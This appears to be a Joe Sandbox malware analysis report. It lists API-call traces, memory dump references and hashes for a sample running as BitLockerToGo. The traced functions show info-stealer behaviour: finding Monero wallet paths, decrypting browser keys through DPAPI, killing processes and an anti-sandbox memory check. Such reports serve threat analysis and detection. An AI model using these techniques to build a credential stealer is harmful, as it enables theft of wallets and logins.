                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                                                                                                                          • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3225020163-4244082812
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 5aa9b0df1a1db7bfbfaa0f140dc2ee4cf2c9c5c753062689482efd1c0a8df6c6
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: ab622cd71b3969c1273f69e078981289709c5c2fe7646e6bae12913b78e8f99b
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5aa9b0df1a1db7bfbfaa0f140dc2ee4cf2c9c5c753062689482efd1c0a8df6c6
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8F0F479AC0304BFF7105B91DC4BFAB7ABDEB44B05F100554FF01A5185DBB05A50D665
                                                                                                                                                                                                                                                                                                                                                          Function 02A144FD Relevance: 10.5, APIs: 7, Instructions: 49processCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 02A1451F
                                                                                                                                                                                                                                                                                                                                                          • Process32First.KERNEL32(00000000,00000128), ref: 02A14533
                                                                                                                                                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 02A14559
                                                                                                                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 02A14568
                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 02A1456F
                                                                                                                                                                                                                                                                                                                                                          • Process32Next.KERNEL32(?,00000128), ref: 02A14582
                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 02A14592
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2696918072-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d63980a2c8793c3a69ae86441b7d2837fcdc72499710a3504dac50c56e37b82e
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b3e21c1c3f43e6d0bb726ee52088f3d44c3f3b99574d65917526e03ff262b2fe
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d63980a2c8793c3a69ae86441b7d2837fcdc72499710a3504dac50c56e37b82e
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21113C71D81229ABDB219F649D4ABEA7AF4BF08725F0001A5F905A6180DF706F50CF92
                                                                                                                                                                                                                                                                                                                                                          Function 02A1278C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40registrymemoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,02A15BD2,Windows: ,02A378E0), ref: 02A127A0
                                                                                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02A127A7
                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,02A378C8,?,?,?,02A15BD2,Windows: ,02A378E0), ref: 02A127D5
                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(02A378C8,00000000,00000000,00000000,000000FF,?,?,?,02A15BD2,Windows: ,02A378E0), ref: 02A127F1
                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(02A378C8,?,?,?,02A15BD2,Windows: ,02A378E0), ref: 02A127FA
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                                                                                                                          • String ID: Windows 11
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3225020163-2517555085
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: b68641aadd6222c3ff56423731c3320e0ae5aae80330a37153530e9106697351
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6b731ba4ba1e2f4bdafb69b183510a33a7f2ca7df85b5a5255aec7e3136dba44
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b68641aadd6222c3ff56423731c3320e0ae5aae80330a37153530e9106697351
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72F04F79A80304FFEB109B90DC0BFAB7AB9EB84750F140524BF01D5184DBB0D960DB51
                                                                                                                                                                                                                                                                                                                                                          Function 02A12805 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36registrymemoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,02A12877,02A127B4,?,?,?,02A15BD2,Windows: ,02A378E0), ref: 02A12819
                                                                                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02A12820
                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,02A378C8,?,?,?,02A12877,02A127B4,?,?,?,02A15BD2,Windows: ,02A378E0), ref: 02A1283E
                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(02A378C8,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,02A12877,02A127B4,?,?,?,02A15BD2,Windows: ), ref: 02A12859
                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(02A378C8,?,?,?,02A12877,02A127B4,?,?,?,02A15BD2,Windows: ,02A378E0), ref: 02A12862
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                                                                                                                          • String ID: CurrentBuildNumber
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3225020163-1022791448
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c2903e25035a540dab7414a0bc2b6caa0bac6f37120135a03609ba9ceb5eea93
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: f5e7c6befdb9b9e412e7966dc3e6f3cbfce1c587b7f40cbc1857ad20b13e8447
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c2903e25035a540dab7414a0bc2b6caa0bac6f37120135a03609ba9ceb5eea93
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8F01D79A80204BBEB119B90DC4BFAB7AB9EB44B50F100554FB01A5084DBB05A619A51
                                                                                                                                                                                                                                                                                                                                                          Function 02A173AA Relevance: 9.1, APIs: 6, Instructions: 107registrystringCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A173DF
                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,00000000,?), ref: 02A173FF
                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF), ref: 02A17425
                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 02A17431
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,?), ref: 02A17460
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?), ref: 02A17473
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcat$CloseOpenQueryValue_memset
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3891774339-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: bd897612cc00ddf7eef8d48102cde0f4261e3512fd5dde6222debe21c0604ca9
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e125e97e41ddc4c00a612b19007e0c73bbd49e3e211ea5cb0b78eb5e807d1470
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bd897612cc00ddf7eef8d48102cde0f4261e3512fd5dde6222debe21c0604ca9
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72415E75CC001D9FCB15EB60ED85FE9B7BAFB08314F4408A5A60D921A0DEB09ED99F91
                                                                                                                                                                                                                                                                                                                                                          Function 02A093A4 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 105stringCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,02A0F752,?,?,?), ref: 02A09163
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,02A0F752,?,?,?), ref: 02A0917A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,02A0F752,?,?,?), ref: 02A09191
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,02A0F752,?,?,?), ref: 02A091A8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: CloseHandle.KERNEL32(?,?,?,?,?,02A0F752,?,?,?), ref: 02A091D0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13A7B: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,02A18680,?), ref: 02A13A93
                                                                                                                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?), ref: 02A093EE
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A091FF: LocalAlloc.KERNEL32(00000040,?,00000001,?,?,?,?,02A0665F,00000000,?), ref: 02A09239
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A092A6: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,02A09456), ref: 02A092C9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A092A6: LocalAlloc.KERNEL32(00000040,02A09456,?,?,02A09456,?,02A0DC56,?,?,?,?,?,?), ref: 02A092DD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A092A6: LocalFree.KERNEL32(?,?,?,02A09456,?,02A0DC56,?,?,?,?,?,?), ref: 02A09302
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(00000001,?,?,?,?,?,?), ref: 02A0947F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18BE6: CreateThread.KERNEL32(00000000,00000000,02A18B15,?,00000000,00000000), ref: 02A18C85
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 02A18C8D
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Local$Alloc$File$Createlstrcpylstrlen$CloseCryptDataFreeHandleObjectReadSingleSizeThreadUnprotectWaitlstrcat
                                                                                                                                                                                                                                                                                                                                                          • String ID: $"encrypted_key":"$DPAPI$_key.txt
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2040183763-3468172165
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 6f0738f5d2463df6fbcfda1deb1c32d5620bb1b49394b6d119e04cc0a61dd207
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 579d599812e648b2460a0381f20fc6e09edd740744e9eb0c958842a75abb80e9
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f0738f5d2463df6fbcfda1deb1c32d5620bb1b49394b6d119e04cc0a61dd207
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E316B76A4020AAFDF10EFA4EEC1ADE7775AF04764F208164E904A62D1DF35DA458EA0
                                                                                                                                                                                                                                                                                                                                                          Function 02A09148 Relevance: 9.1, APIs: 6, Instructions: 60filememoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,02A0F752,?,?,?), ref: 02A09163
                                                                                                                                                                                                                                                                                                                                                          • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,02A0F752,?,?,?), ref: 02A0917A
                                                                                                                                                                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,02A0F752,?,?,?), ref: 02A09191
                                                                                                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,02A0F752,?,?,?), ref: 02A091A8
                                                                                                                                                                                                                                                                                                                                                          • LocalFree.KERNEL32(02A0FCF9,?,?,?,?,02A0F752,?,?,?), ref: 02A091C7
                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,02A0F752,?,?,?), ref: 02A091D0
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2311089104-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4bdf7b20ca0e2629543850e17f1c80b8f0c4a43d1170a175ca7cc5239699f27d
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 41d1b4ce790fad3edb59acb19302a47c52cbf32dfa9a2b6f817e7ed1a93a9f15
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4bdf7b20ca0e2629543850e17f1c80b8f0c4a43d1170a175ca7cc5239699f27d
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04114CB4A00205EBDB219FA4ECCDFAF7BB5FB84B50F100958F941A2180DB309A95DB11
                                                                                                                                                                                                                                                                                                                                                          Function 02A010E0 Relevance: 9.1, APIs: 6, Instructions: 54memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 02A0109A
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A010C0
                                                                                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 02A010D6
                                                                                                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,02A19CAB), ref: 02A010F0
                                                                                                                                                                                                                                                                                                                                                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 02A010F7
                                                                                                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 02A01102
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
